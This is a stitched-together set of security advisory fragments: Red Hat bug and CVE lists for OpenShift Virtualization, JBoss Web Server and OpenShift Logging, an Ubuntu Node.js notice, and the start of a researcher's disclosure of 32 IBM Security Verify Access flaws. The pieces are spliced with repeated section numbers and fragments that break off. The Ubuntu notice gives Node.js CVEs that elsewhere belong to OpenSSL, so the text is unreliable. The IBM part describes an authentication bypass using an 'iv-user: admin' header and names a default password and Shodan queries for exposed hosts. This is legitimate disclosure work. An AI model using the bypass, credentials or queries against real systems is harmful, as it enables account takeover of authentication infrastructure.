Boot Source Reference\u0027 view as a non-priv user\n2101499 - Cannot add NIC to VM template as non-priv user\n2101501 - NAME parameter in VM template has no effect. \n2101628 - non-priv user cannot load dataSource while edit template\u0027s rootdisk\n2101667 - VMI view is not aligned with vm and tempates\n2101681 - All templates are labeling \"source available\" in template list page\n2102074 - VM Creation time on VM Overview Details card lacks string\n2102125 - vm clone modal is displaying DV size instead of PVC size\n2102132 - align the utilization card of single VM overview with the design\n2102138 - Should the word \"new\" be removed from \"Create new VirtualMachine from catalog\"?\n2102256 - Add button moved to right\n2102448 - VM disk is deleted by uncheck \"Delete disks (1x)\" on delete modal\n2102475 - Template \u0027vm-template-example\u0027 should be filtered by \u0027Fedora\u0027 rather than \u0027Other\u0027\n2102561 - sysprep-info should link to downstream doc\n2102737 - Clone a VM should lead to vm overview tab\n2102740 - \"Save\" button on vm clone modal should be \"Clone\"\n2103806 - \"404: Not Found\" appears shortly by clicking the PVC link on vm disk tab\n2103807 - PVC is not named by VM name while creating vm quickly\n2103817 - Workload profile values in vm details should align with template\u0027s value\n2103844 - VM nic model is empty\n2104331 - VM list page scroll up automatically\n2104402 - VM create button is not enabled while adding multiple environment disks\n2104422 - Storage status report \"OpenShift Data Foundation is not available\" even the operator is installed\n2104424 - Enable descheduler or hide it on template\u0027s scheduling tab\n2104479 - [4.12] Cloned VM\u0027s snapshot restore fails if the source VM disk is deleted\n2104480 - Alerts in VM overview tab disappeared after a few seconds\n2104785 - \"Add disk\" and \"Disks\" are on the same line\n2104859 - [RFE] Add \"Copy SSH command\" to VM action list\n2105257 - Can\u0027t set log verbosity level for virt-operator pod\n2106175 - All pages are crashed after visit Virtualization -\u003e Overview\n2106963 - Cannot add configmap for windows VM\n2107279 - VM Template\u0027s bootable disk can be marked as bootable\n2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read\n2107371 - CVE-2022-30630 golang: io/fs: stack exhaustion in Glob\n2107374 - CVE-2022-1705 golang: net/http: improper sanitization of Transfer-Encoding header\n2107376 - CVE-2022-1962 golang: go/parser: stack exhaustion in all Parse* functions\n2107383 - CVE-2022-32148 golang: net/http/httputil: NewSingleHostReverseProxy - omit X-Forwarded-For not working\n2107386 - CVE-2022-30632 golang: path/filepath: stack exhaustion in Glob\n2107388 - CVE-2022-30635 golang: encoding/gob: stack exhaustion in Decoder.Decode\n2107390 - CVE-2022-28131 golang: encoding/xml: stack exhaustion in Decoder.Skip\n2107392 - CVE-2022-30633 golang: encoding/xml: stack exhaustion in Unmarshal\n2108339 - datasource does not provide timestamp when updated\n2108638 - When chosing a vm or template while in all-namespace, and returning to list, namespace is changed\n2109818 - Upstream metrics documentation is not detailed enough\n2109975 - DataVolume fails to import \"cirros-container-disk-demo\" image\n2110256 - Storage -\u003e PVC -\u003e upload data, does not support source reference\n2110562 - CNV introduces a compliance check fail in \"ocp4-moderate\" profile - routes-protected-by-tls\n2111240 - GiB changes to B in Template\u0027s Edit boot source reference modal\n2111292 - kubevirt plugin console is crashed after creating a vm with 2 nics\n2111328 - kubevirt plugin console crashed after visit vmi page\n2111378 - VM SSH command generated by UI points at api VIP\n2111744 - Cloned template should not label `app.kubernetes.io/name: common-templates`\n2111794 - the virtlogd process is taking too much RAM! (17468Ki \u003e 17Mi)\n2112900 - button style are different\n2114516 - Nothing happens after clicking on Fedora cloud image list link\n2114636 - The style of displayed items are not unified on VM tabs\n2114683 - VM overview tab is crashed just after the vm is created\n2115257 - Need to Change system-product-name to \"OpenShift  Virtualization\" in CNV-4.12\n2115258 - The storageclass of VM disk is different from quick created and customize created after changed the default storageclass\n2115280 - [e2e] kubevirt-e2e-aws see two duplicated navigation items\n2115769 - Machine type is updated to rhel8.6.0 in KV CR but not in Templates\n2116225 - The filter keyword of the related operator \u0027Openshift Data Foundation\u0027 is \u0027OCS\u0027 rather than \u0027ODF\u0027\n2116644 - Importer pod is failing to start with error \"MountVolume.SetUp failed for volume \"cdi-proxy-cert-vol\" : configmap \"custom-ca\" not found\"\n2117549 - Cannot edit cloud-init data after add ssh key\n2117803 - Cannot edit ssh even vm is stopped\n2117813 - Improve descriptive text of VM details while VM is off\n2117872 - CVE-2022-1798 kubeVirt: Arbitrary file read on the host from KubeVirt VMs\n2118257 - outdated doc link tolerations modal\n2118823 - Deprecated API 1.25 call: virt-cdi-controller/v0.0.0 (linux/amd64) kubernetes/$Format\n2119069 - Unable to start windows VMs on PSI setups\n2119128 - virt-launcher cannot be started on OCP 4.12 due to PodSecurity restricted:v1.24\n2119309 - readinessProbe in VM stays on failed\n2119615 - Change the disk size causes the unit changed\n2120907 - Cannot filter disks by label\n2121320 - Negative values in migration metrics\n2122236 - Failing to delete HCO with SSP sticking around\n2122990 - VMExport should check APIGroup\n2124147 - \"ReadOnlyMany\" should not be added to supported values in memory dump\n2124307 - Ui crash/stuck on loading when trying to detach disk on a VM\n2124528 - On upgrade, when live-migration is failed due to an infra issue, virt-handler continuously and endlessly tries to migrate it\n2124555 - View documentation link on MigrationPolicies page des not work\n2124557 - MigrationPolicy description is not displayed on Details page\n2124558 - Non-privileged user can start MigrationPolicy creation\n2124565 - Deleted DataSource reappears in list\n2124572 - First annotation can not be added to DataSource\n2124582 - Filtering VMs by OS does not work\n2124594 - Docker URL validation is inconsistent over application\n2124597 - Wrong case in Create DataSource menu\n2126104 - virtctl image-upload hangs waiting for pod to be ready with missing access mode defined in the storage profile\n2126397 - many KubeVirtComponentExceedsRequestedMemory alerts in Firing state\n2127787 - Expose the PVC source of the dataSource on UI\n2127843 - UI crashed by selecting \"Live migration network\"\n2127931 - Change default time range on Virtualization -\u003e Overview -\u003e Monitoring dashboard to 30 minutes\n2127947 - cluster-network-addons-config tlsSecurityProfle takes a long time to update after setting APIServer\n2128002 - Error after VM template deletion\n2128107 - sriov-manage command fails to enable SRIOV Virtual functions on the Ampere GPU Cards\n2128872 - [4.11]Can\u0027t restore cloned VM\n2128948 - Cannot create DataSource from default YAML\n2128949 - Cannot create MigrationPolicy from example YAML\n2128997 - [4.11.1]virt-launcher cannot be started on OCP 4.12 due to PodSecurity restricted:v1.24\n2129013 - Mark Windows 11 as TechPreview\n2129234 - Service is not deleted along with the VM when the VM is created from a template with service\n2129301 - Cloud-init network data don\u0027t wipe out on uncheck checkbox \u0027Add network data\u0027\n2129870 - crypto-policy : Accepting TLS 1.3 connections by validating webhook\n2130509 - Auto image import in failed state with data sources pointing to external manually-created PVC/DV\n2130588 - crypto-policy : Common Ciphers support by apiserver and hco\n2130695 - crypto-policy : Logging Improvement and publish the source of ciphers\n2130909 - Non-privileged user can start DataSource creation\n2131157 - KV data transfer rate chart in VM Metrics tab is not displayed\n2131165 - [dark mode] Additional statuses accordion on Virtualization Overview page not visible enough\n2131674 - Bump virtlogd memory requirement to 20Mi\n2132031 - Ensure Windows 2022 Templates are marked as TechPreview like it is done now for Windows 11\n2132682 - Default YAML entity name convention. \n2132721 - Delete dialogs\n2132744 - Description text is missing in Live Migrations section\n2132746 - Background is broken in Virtualization Monitoring page\n2132783 - VM can not be created from Template with edited boot source\n2132793 - Edited Template BSR is not saved\n2132932 - Typo in PVC size units menu\n2133540 - [pod security violation audit] Audit violation in \"cni-plugins\" container should be fixed\n2133541 - [pod security violation audit] Audit violation in \"bridge-marker\" container should be fixed\n2133542 - [pod security violation audit] Audit violation in \"manager\" container should be fixed\n2133543 - [pod security violation audit] Audit violation in \"kube-rbac-proxy\" container should be fixed\n2133655 - [pod security violation audit] Audit violation in \"cdi-operator\" container should be fixed\n2133656 - [4.12][pod security violation audit] Audit violation in \"hostpath-provisioner-operator\" container should be fixed\n2133659 - [pod security violation audit] Audit violation in \"cdi-controller\" container should be fixed\n2133660 - [pod security violation audit] Audit violation in \"cdi-source-update-poller\" container should be fixed\n2134123 - KubeVirtComponentExceedsRequestedMemory Alert for virt-handler pod\n2134672 - [e2e] add data-test-id for catalog -\u003e storage section\n2134825 - Authorization for expand-spec endpoint missing\n2135805 - Windows 2022 template is missing vTPM and UEFI params in spec\n2136051 - Name jumping when trying to create a VM with source from catalog\n2136425 - Windows 11 is detected as Windows 10\n2136534 - Not possible to specify a TTL on VMExports\n2137123 - VMExport: export pod is not PSA complaint\n2137241 - Checkbox about delete vm disks is not loaded while deleting VM\n2137243 - registery input add docker prefix twice\n2137349 - \"Manage source\" action infinitely loading on DataImportCron details page\n2137591 - Inconsistent dialog headings/titles\n2137731 - Link of VM status in overview is not working\n2137733 - No link for VMs in error status in \"VirtualMachine statuses\" card\n2137736 - The column name \"MigrationPolicy name\" can just be \"Name\"\n2137896 - crypto-policy: HCO should pick TLSProfile from apiserver if not provided explicitly\n2138112 - Unsupported S3 endpoint option in Add disk modal\n2138119 - \"Customize VirtualMachine\" flow is not user-friendly because settings are split into 2 modals\n2138199 - Win11 and Win22 templates are not filtered properly by Template provider\n2138653 - Saving Template prameters reloads the page\n2138657 - Setting DATA_SOURCE_* Template parameters makes VM creation fail\n2138664 - VM that was created with SSH key fails to start\n2139257 - Cannot add disk via \"Using an existing PVC\"\n2139260 - Clone button is disabled while VM is running\n2139293 - Non-admin user cannot load VM list page\n2139296 - Non-admin cannot load MigrationPolicies page\n2139299 - No auto-generated VM name while creating VM by non-admin user\n2139306 - Non-admin cannot create VM via customize mode\n2139479 - virtualization overview crashes for non-priv user\n2139574 - VM name gets \"emptyname\" if click the create button quickly\n2139651 - non-priv user can click create when have no permissions\n2139687 - catalog shows template list for non-priv users\n2139738 - [4.12]Can\u0027t restore cloned VM\n2139820 - non-priv user cant reach vm details\n2140117 - Provide upgrade path from 4.11.1-\u003e4.12.0\n2140521 - Click the breadcrumb list about \"VirtualMachines\" goes to undefined project\n2140534 - [View only] it should give a permission error when user clicking the VNC play/connect button as a view only user\n2140627 - Not able to select storageClass if there is no default storageclass defined\n2140730 - Links on Virtualization Overview page lead to wrong namespace for non-priv user\n2140808 - Hyperv feature set to \"enabled: false\" prevents scheduling\n2140977 - Alerts number is not correct on Virtualization overview\n2140982 - The base template of cloned template is \"Not available\"\n2140998 - Incorrect information shows in overview page per namespace\n2141089 - Unable to upload boot images. \n2141302 - Unhealthy states alerts and state metrics are missing\n2141399 - Unable to set TLS Security profile for CDI using HCO jsonpatch annotations\n2141494 - \"Start in pause mode\" option is not available while creating the VM\n2141654 - warning log appearing on VMs: found no SR-IOV networks\n2141711 - Node column selector is redundant for non-priv user\n2142468 - VM action \"Stop\" should not be disabled when VM in pause state\n2142470 - Delete a VM or template from all projects leads to 404 error\n2142511 - Enhance alerts card in overview\n2142647 - Error after MigrationPolicy deletion\n2142891 - VM latency checkup: Failed to create the checkup\u0027s Job\n2142929 - Permission denied when try get instancestypes\n2143268 - Topolvm storageProfile missing accessModes and volumeMode\n2143498 - Could not load template while creating VM from catalog\n2143964 - Could not load template while creating VM from catalog\n2144580 - \"?\" icon is too big in VM Template Disk tab\n2144828 - \"?\" icon is too big in VM Template Disk tab\n2144839 - Alerts number is not correct on Virtualization overview\n2153849 - After upgrade to 4.11.1-\u003e4.12.0 hco.spec.workloadUpdateStrategy value is getting overwritten\n2155757 - Incorrect upstream-version label \"v1.6.0-unstable-410-g09ea881c\" is tagged to 4.12 hyperconverged-cluster-operator-container and hyperconverged-cluster-webhook-container\n\n5. Description:\n\nRed Hat JBoss Web Server is a fully integrated and certified set of\ncomponents for hosting Java web applications. It is comprised of the Apache\nTomcat Servlet container, JBoss HTTP Connector (mod_cluster), the\nPicketLink Vault extension for Apache Tomcat, and the Tomcat Native\nlibrary. This release includes bug fixes,\nenhancements and component upgrades, which are documented in the Release\nNotes, linked to in the References. \n\nThe References section of this erratum contains a download link for the\nupdate. This software, such as Apache HTTP Server, is\ncommon to multiple JBoss middleware products, and is packaged under Red Hat\nJBoss Core Services to allow for faster distribution of updates, and for a\nmore consistent update experience. \n\nSecurity Fix(es):\n\n* libxml2: integer overflows with XML_PARSE_HUGE (CVE-2022-40303)\n* libxml2: dict corruption caused by entity reference cycles\n(CVE-2022-40304)\n* expat: a use-after-free in the doContent function in xmlparse.c\n(CVE-2022-40674)\n* zlib: a heap-based buffer over-read or buffer overflow in inflate in\ninflate.c via a large gzip header extra field (CVE-2022-37434)\n* curl: HSTS bypass via IDN (CVE-2022-42916)\n* curl: HTTP proxy double-free (CVE-2022-42915)\n* curl: POST following PUT confusion (CVE-2022-32221)\n* httpd: mod_proxy: X-Forwarded-For dropped by hop-by-hop mechanism\n(CVE-2022-31813)\n* httpd: mod_sed: DoS vulnerability (CVE-2022-30522)\n* httpd: out-of-bounds read in ap_strcmp_match() (CVE-2022-28615)\n* httpd: out-of-bounds read via ap_rwrite() (CVE-2022-28614)\n* httpd: mod_proxy_ajp: Possible request smuggling (CVE-2022-26377)\n* curl: control code in cookie denial of service (CVE-2022-35252)\n* zlib: a heap-based buffer over-read or buffer overflow in inflate in\ninflate.c via a large gzip header extra field (CVE-2022-37434)\n* jbcs-httpd24-httpd: httpd: mod_isapi: out-of-bounds read (CVE-2022-28330)\n* curl: Unpreserved file permissions (CVE-2022-32207)\n* curl: various flaws (CVE-2022-32206 CVE-2022-32208)\n* openssl: the c_rehash script allows command injection (CVE-2022-2068)\n* openssl: c_rehash script allows command injection (CVE-2022-1292)\n* jbcs-httpd24-httpd: httpd: core: Possible buffer overflow with very large\nor unlimited LimitXMLRequestBody (CVE-2022-22721)\n* jbcs-httpd24-httpd: httpd: mod_sed: Read/write beyond bounds\n(CVE-2022-23943)\n\nFor more details about the security issue(s), including the impact, a CVSS\nscore, acknowledgments, and other related information, refer to the CVE\npage(s) listed in the References section. Bugs fixed (https://bugzilla.redhat.com/):\n\n2064319 - CVE-2022-23943 httpd: mod_sed: Read/write beyond bounds\n2064320 - CVE-2022-22721 httpd: core: Possible buffer overflow with very large or unlimited LimitXMLRequestBody\n2081494 - CVE-2022-1292 openssl: c_rehash script allows command injection\n2094997 - CVE-2022-26377 httpd: mod_proxy_ajp: Possible request smuggling\n2095000 - CVE-2022-28330 httpd: mod_isapi: out-of-bounds read\n2095002 - CVE-2022-28614 httpd: Out-of-bounds read via ap_rwrite()\n2095006 - CVE-2022-28615 httpd: Out-of-bounds read in ap_strcmp_match()\n2095015 - CVE-2022-30522 httpd: mod_sed: DoS vulnerability\n2095020 - CVE-2022-31813 httpd: mod_proxy: X-Forwarded-For dropped by hop-by-hop mechanism\n2097310 - CVE-2022-2068 openssl: the c_rehash script allows command injection\n2099300 - CVE-2022-32206 curl: HTTP compression denial of service\n2099305 - CVE-2022-32207 curl: Unpreserved file permissions\n2099306 - CVE-2022-32208 curl: FTP-KRB bad message verification\n2116639 - CVE-2022-37434 zlib: heap-based buffer over-read and overflow in inflate() in inflate.c via a large gzip header extra field\n2120718 - CVE-2022-35252 curl: control code in cookie denial of service\n2130769 - CVE-2022-40674 expat: a use-after-free in the doContent function in xmlparse.c\n2135411 - CVE-2022-32221 curl: POST following PUT confusion\n2135413 - CVE-2022-42915 curl: HTTP proxy double-free\n2135416 - CVE-2022-42916 curl: HSTS bypass via IDN\n2136266 - CVE-2022-40303 libxml2: integer overflows with XML_PARSE_HUGE\n2136288 - CVE-2022-40304 libxml2: dict corruption caused by entity reference cycles\n\n5. ==========================================================================\nUbuntu Security Notice USN-6457-1\nOctober 30, 2023\n\nnodejs vulnerabilities\n==========================================================================\n\nA security issue affects these releases of Ubuntu and its derivatives:\n\n- Ubuntu 22.04 LTS\n\nSummary:\n\nSeveral security issues were fixed in Node.js. \n\nSoftware Description:\n- nodejs: An open-source, cross-platform JavaScript runtime environment. \n\nDetails:\n\nTavis Ormandy discovered that Node.js incorrectly handled certain inputs. If a\nuser or an automated system were tricked into opening a specially crafted\ninput file, a remote attacker could possibly use this issue to cause a\ndenial of service. (CVE-2022-0778)\n\nElison Niven discovered that Node.js incorrectly handled certain inputs. (CVE-2022-1292)\n\nChancen and Daniel Fiala discovered that Node.js incorrectly handled certain\ninputs. (CVE-2022-2068)\n\nAlex Chernyakhovsky discovered that Node.js incorrectly handled certain\ninputs. (CVE-2022-2097)\n\nUpdate instructions:\n\nThe problem can be corrected by updating your system to the following\npackage versions:\n\nUbuntu 22.04 LTS:\n   libnode-dev                     12.22.9~dfsg-1ubuntu3.1\n   libnode72                       12.22.9~dfsg-1ubuntu3.1\n   nodejs                          12.22.9~dfsg-1ubuntu3.1\n   nodejs-doc                      12.22.9~dfsg-1ubuntu3.1\n\nIn general, a standard system update will make all the necessary changes. Solution:\n\nFor OpenShift Container Platform 4.9 see the following documentation, which\nwill be updated shortly, for detailed release notes:\n\nhttps://docs.openshift.com/container-platform/4.9/logging/cluster-logging-release-notes.html\n\nFor Red Hat OpenShift Logging 5.3, see the following instructions to apply\nthis update:\n\nhttps://docs.openshift.com/container-platform/4.9/logging/cluster-logging-upgrading.html\n\n4. Bugs fixed (https://bugzilla.redhat.com/):\n\n2064698 - CVE-2020-36518 jackson-databind: denial of service via a large depth of nested objects\n2135244 - CVE-2022-42003 jackson-databind: deep wrapper array nesting wrt UNWRAP_SINGLE_VALUE_ARRAYS\n2135247 - CVE-2022-42004 jackson-databind: use of deeply nested arrays\n\n5. JIRA issues fixed (https://issues.jboss.org/):\n\nLOG-3293 - log-file-metric-exporter container has not limits exhausting the resources of the node\n\n6. -----BEGIN PGP SIGNED MESSAGE-----\nHash: SHA512\n\n## Advisory Information\n\nTitle: 32 vulnerabilities in IBM Security Verify Access\nAdvisory URL: https://pierrekim.github.io/advisories/2024-ibm-security-verify-access.txt\nBlog URL: https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html\nDate published: 2024-11-01\nVendors contacted: IBM\nRelease mode: Released\nCVE: CVE-2022-2068, CVE-2023-30997, CVE-2023-30998, CVE-2023-31001, CVE-2023-31004, CVE-2023-31005, CVE-2023-31006, CVE-2023-32328, CVE-2023-32329, CVE-2023-32330, CVE-2023-38267, CVE-2023-38267, CVE-2023-38368, CVE-2023-38369, CVE-2023-38370, CVE-2023-43017, CVE-2024-25027, CVE-2024-35137, CVE-2024-35139, CVE-2024-35140, CVE-2024-35141, CVE-2024-35142\n\n\n\n## Product description\n\n\u003e IBM Security Verify Access is a complete authorization and network security policy management solution. It provides end-to-end protection of resources over geographically dispersed intranets and extranets. \n\u003e In addition to state-of-the-art security policy management, IBM Security Verify Access provides authentication, authorization, data security, and centralized resource management capabilities. \n\u003e \n\u003e IBM Security Verify Access offers the following features:\n\u003e\n\u003e - Authentication\n\u003e\n\u003e Provides a wide range of built-in authenticators and supports external authenticators. \n\u003e \n\u003e - Authorization\n\u003e\n\u003e Provides permit and deny decisions for protected resources requests in the secure domain through the authorization API. \n\u003e \n\u003e - Data security and centralized resource management\n\u003e\n\u003e Manages secure access to private internal network-based resources by using the public Internet\u0027s broad connectivity and ease of use with a corporate firewall system. \n\u003e\n\u003e From https://www.ibm.com/docs/en/sva/10.0.8?topic=overview-introduction-security-verify-access\n\n\n\n## Vulnerability Summary\n\nVulnerable versions: IBM Security Verify Access \u003c 10.0.8. \n\nThe summary of the vulnerabilities is as follows:\n\n1. non-assigned CVE vulnerability - Authentication Bypass on IBM Security Verify Runtime\n2. CVE-2024-25027 - Reuse of snapshot private keys\n3. CVE-2023-30997 - Local Privilege Escalation using OpenLDAP\n4. CVE-2023-30998 - Local Privilege Escalation using rpm\n5. CVE-2023-38267, CVE-2024-35141, CVE-2024-35142 - Insecure setuid binaries and multiple Local Privilege Escalation in IBM codes\n5.1. CVE-2023-38267 - Local Privilege Escalation using mesa_config - import of a new snapshot\n5.2. CVE-2024-35141 - Local Privilege Escalation using mesa_config - command injections\n5.3. CVE-2023-38267 - Local Privilege Escalation using mesa_cli - import of a new snapshot\n5.4. CVE-2024-35142 - Local Privilege Escalation using mesa_cli - telnet escape shell\n6. CVE-2023-43017 - PermitRootLogin set to yes\n8. CVE-2024-35137 and CVE-2024-35139 - Lack of password for the `cluster` user\n9. CVE-2023-38368 - Non-standard way of storing hashes and world-readable files containing hashes\n10. CVE-2023-38369 - Hardcoded PKCS#12 files\n11. CVE-2023-31001 - Incorrect permissions in verify-access-dsc (race condition and leak of private key\n12. non-assigned CVE vulnerability - Insecure health_check.sh script in verify-access (race condition and leak of private key)\n13. CVE-2024-35140 - Local Privilege Escalation due to insecure health_check.sh script in verify-access (insecure SSL, insecure files)\n14. CVE-2024-35140 (duplicate?) - Local Privilege Escalation due to insecure health_check.sh script in verify-access-dsc (insecure SSL, insecure file)\n15. CVE-2023-31004 - Remote Code Execution due to insecure download of snapshot in verify-access-dsc, verify-access-runtime and verify-access-wrp\n16. CVE-2023-31005 - Lack of authentication in Postgres inside verify-access-runtime\n17. CVE-2023-31006 - Null pointer dereference in dscd - Remote DoS against DSC instances\n18. CVE-2023-32327 - XML External Entity (XXE) in dscd\n19. CVE-2023-38370 - Remote Code Execution due to insecure download of rpm and zip files in verify-access-dsc, verify-access-runtime and verify-access-wrp (/usr/sbin/install_isva.sh)\n20. non-assigned CVE vulnerability - Remote Code Execution due to insecure download of rpm in verify-access-runtime (/usr/sbin/install_java_liberty.sh)\n21. CVE-2023-32328 - Remote Code Execution due to insecure Repository configuration\n22. CVE-2023-32329 - Additional repository configuration (potential supply-chain attack)\n23. non-assigned CVE vulnerability - Remote Code Execution due to insecure /usr/sbin/install_system.sh script in verify-access-runtime\n24. CVE-2023-32330 - Remote Code Execution due to insecure reload script in verify-access-runtime\n25. CVE-2023-32330 (duplicate?) - Remote Code Execution due to insecure reload script in verify-access-wrp\n26. non-assigned CVE vulnerability - Hardcoded private key for IBM ISS (ibmcom/verify-access)\n27. non-assigned CVE vulnerability - dcatool using an outdated OpenSSL library (ibmcom/verify-access)\n28. non-assigned CVE vulnerability - iss-lum using an outdated OpenSSL library (ibmcom/verify-access) and hardcoded keys\n29. non-assigned CVE vulnerability - Outdated \"IBM Crypto for C\" library\n30. non-assigned CVE vulnerability - Webseald using outdated code with remotely exploitable vulnerabilities\n30.1. Libmodsecurity.so - 1 non-assigned CVE vulnerability\n30.2. libtivsec_yamlcpp.so - 4 CVEs\n30.3. libtivsec_xml4c.so - outdated Xerces-C library\n31. non-assigned CVE vulnerability - Outdated and untrusted CAs used in the Docker images\n32. non-assigned CVE vulnerability - Lack of privilege separation in Docker instances\n\nTL;DR: An attacker can compromise IBM Security Verify Access using multiple vulnerabilities (7 RCEs, 1 auth bypass, 8 LPEs and some additional vulnerabilities). \nIBM Security Verify Access is a SSO solution mainly used by banks, Fortune 500 companies and governmental entities. \n\n_Miscellaneous notes_:\n\nThe vulnerabilities were found in October 2022 and were communicated to IBM at the beginning of 2023. They ultimately were patched at the end of June 2024 (after 18 months). Requiring 1.5 years to provide security patches for vulnerabilities found in a SSO solution does not appear to be in par with current cybersecurity risks and is quite worrying. Update: Following communications with IBM PSIRT in September 2024 regarding missing CVEs and the publication of this security advisory, it was confirmed that at least one vulnerability was not yet patched (a 2017 DoS in libinjection, no CVE). \n\nThe vulnerabilities were patched progressively in the 10.0.6, 10.0.7 and 10.0.8 versions. It is unclear if all the non-assigned CVE vulnerabilities have been patched but IBM confirmed that all the vulnerabilities were patched and then IBM closed all the corresponding tickets. \n\nOther issues had been reported but ultimately were dismissed (e.g. hard-to-trigger crashes and I did not have any time left for this security assessment). \n\nCommunication with IBM was difficult since IBM closed the tickets used to track the vulnerabilities multiple times without releasing any security patches. The timeline provided at the later part of this advisory provides an overview of the interactions I have had with IBM. IBM PSIRT redirected queries to IBM support and IBM support provided extremely disappointing answers to vulnerabilities. When I went back to IBM PSIRT with these answers, IBM PSIRT refused them and provided opposite answers. Reporting vulnerabilities to IBM was also inefficient. When I asked IBM for missing CVEs in September 2024, IBM PSIRT confirmed that patches were missing. All the tickets were already closed in June 2024 by IBM and I previously received confirmation that all the vulnerabilities had been patched. \n\nSecurity bulletins were mainly found by following @CVEnew (https://twitter.com/CVEnew) and I had to guess the patched vulnerabilities from the CVE descriptions. After some requests, thankfully, IBM sent me a list of CVEs corresponding to the vulnerabilities I reported. \n\nIt appears that some CVEs are still missing. \n\nFinally, another CVE (CVE-2023-38371 - https://nvd.nist.gov/vuln/detail/CVE-2023-38371), not present in this advisory) was assigned by IBM but refers to an issue (_V-[REDACTED] - Insecure SSLv3 connections to the DSC servers_ in the report sent to IBM) that was confirmed **not** to be a vulnerability by IBM and by me, after a second analysis. This CVE is likely to be revoked. Update: IBM confirmed in September 2024 that this CVE was bogus after I signaled IBM that this is an incorrect CVE. \n\n_Impacts_\n\nAn attacker can compromise the entire authentication infrastructure based on IBM Security Verify Access (ISAM/ISVA appliances and IBM Docker images) using multiple vulnerabilities (7 RCEs, 1 auth bypass, 8 LPEs and some additional vulnerabilities). \nRegarding the threat model, it is worth noting that attackers must be able to MITM traffic or get access inside the LAN of the tested organizations to exploit these vulnerabilities. \n\nWhen the IBM Security Verify Access (ISVA) runtime docker instance (a core component of this solution) is reachable over the network, an attacker can bypass the entire authentication and interact with this back-end instance as any user, providing a complete control over any user without authentication.  The IBM Security Verify Runtime Docker instance provides the advanced access control and federation capabilities and is a core functionality of IBM Security Verify Access: it provides a back-end for authenticating users (for example, it supports HOTP, TOTP, RSA OTP, MAC OTP with email delivery, username and password, FIDO2/WebAuthn...). The back-end APIs provided by the IBM Security Verify Access runtime docker instance are vulnerable to an authentication bypass vulnerability. Since the back-end is fully reachable, this vulnerability allows an attacker to get persistence in a targeted infrastructure by enrolling malicious Multi-Factor Authenticators to any user, without authentication (e.g. an authenticator assigned to any user, protected by a PIN (or not) chosen by the threat actor). In an offensive scenario, an attacker will likely delete authenticators for admins and security team and enroll new authenticators corresponding to admin accounts and get full control over the infrastructure while locking out legit admins. \n\nThis vulnerability has not been patched and IBM recommends implementing network restrictions or using mutual TLS authentication and following best practices:\n\n\u003e Note: If the runtime container is exposed on an external IP address there must be network restrictions in place to ensure that access is not allowed from untrusted clients, or the runtime must be configured to require mutual TLS authentication. \n\u003e \n\u003e From https://www.ibm.com/docs/en/sva/10.0.8?topic=support-docker-image-verify-access-runtime#concept_thc_pnz_w4b__title__1\n\u003e\n\u003e And from https://www.ibm.com/docs/en/sva/10.0.8?topic=settings-runtime-parameters\n\u003e\n\u003e And from https://www.ibm.com/docs/en/sva/10.0.8?topic=appliance-tuning-runtime-application-parameters-tracing-specifications\n\nNote that even with network restrictions, a low privileged user on a trusted machine can fully compromise the authentication solution, since the back-end used to manage the entire authentication infrastructure can be reached without authentication by sending a specific HTTP header. Network exposure of this back-end (e.g. with IPv6, from monitoring servers, from docker servers, from webseal servers [that must, by design, reach the authentication back-end], or using a SSRF vulnerability) means a full take over of the authentication infrastructure, which can be quite problematic for large organizations. \n\n_Recommendations_\n\n- - Apply security patches. \n- - Use network segmentation to isolate the Security Verify Access (ISVA) Runtime Docker instance. \n- - Implement the optional authentication based on SSL certificates in the ISVA Runtime Docker instance (this functionality has been added in the latest ISVA release (10.0.8)). \n- - Flag any additional authenticator added to an account as suspicious. \n- - Review logs for any HTTP access from untrusted IPs to the Security Verify Access Runtime Docker instance. \n\n\nShodan provides a list of websites using this technology. For SOC teams, I suggest using Shodan to check if your organization is using IBM Security Verify Access and following IBM\u0027s security recommendations. Please note that due to the versatility of this solution, it is very difficult to correctly detect affected installations using a blackbox approach:\n\n- - https://www.shodan.io/search?query=http.favicon.hash%3A-2069014068, 1,740 results as of October 30, 2024\n- - https://www.shodan.io/search?query=webseal, 1,083 results as of October 30, 2024\n- - https://www.shodan.io/search?query=CP%3D%22NON+CUR+OTPi+OUR+NOR+UNI%22, 6,673 results as of October 30, 2024\n\n\n\n## Details - Authentication Bypass on IBM Security Verify Runtime\n\nIt is possible to compromise the authentication mechanism and the authentication infrastructure by reaching the APIs provided by the IBM Security Verify Runtime Docker instance. \n\nThe threat model for this vulnerability requires an attacker with network connectivity to the IBM Security Verify Runtime Docker instance (i) from the Internet (if this service is insecurely exposed) or (ii) more likely from within LAN of the audited organization (meaning the threat actor can reach the HTTPS server of IBM Security Verify Runtime Docker instance). \n\nThe IBM Security Verify Runtime Docker instance provides the advanced access control and federation capabilities. It is a core functionality of IBM Security Verify Access: it provides a back-end for authenticating users. For example, it supports HOTP, TOTP, RSA OTP, MAC OTP with email delivery, username and password, FIDO2/WebAuthn... \n\nThe different authentication mechanisms in the APIs provided by the Runtime Docker instance used to manage users (e.g. adding an authenticator for a specific user, removing an authenticator, getting seeds, ...) can be trivially bypassed by specifying an additional HTTP header `iv-user: target-user` (e.g. `iv-user: admin`) in the HTTPS requests. \n\nAdding an additional HTTP header `iv-user: target-user` when querying the APIs will provide a complete control over the `target-user`. \n\nThere is a HTTPs server reachable on port 443/tcp providing APIs:\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\n[please use the HTML version at https://pierrekim.github.io/blog/2024-11-01-ibm-security-verify-access-32-vulnerabilities.html]\n\nUsually, the IBM Security Verify Runtime Docker instance is only reached by WebSEAL servers (reverse-proxies managing authentication), after a successful authentication as `easuser`, as shown below:\n\nDocumentation from https://www.ibm.com/docs/SSPREK_10.0.0/com.ibm.isva.doc/config/reference/ref_isamcfg_wga_worksheet.htm:\n\n\u003e Select the method for authentication between WebSEAL and the Advanced Access Control runtime listening interface\n\u003e \n\u003e Certificate authentication\n\u003e\n\u003e Use a certificate to authenticate between WebSEAL and the Advanced Access Control runtime listening interface. \n\u003e\n\u003e   User ID and password authentication\n\u003e\n\u003e Use credentials to authenticate between WebSEAL and the Advanced Access Control runtime listening interface. \n\u003e   The default username is easuser and the default password is passw0rd. \n\n\nAttack scenario: an attacker will reach the HTTPS APIs provided by the IBM Security Verify Runtime Docker instance and will not use a SSL Certificate or any credential used to manage the instance (`easuser`). \n\n[please use the HTML version at 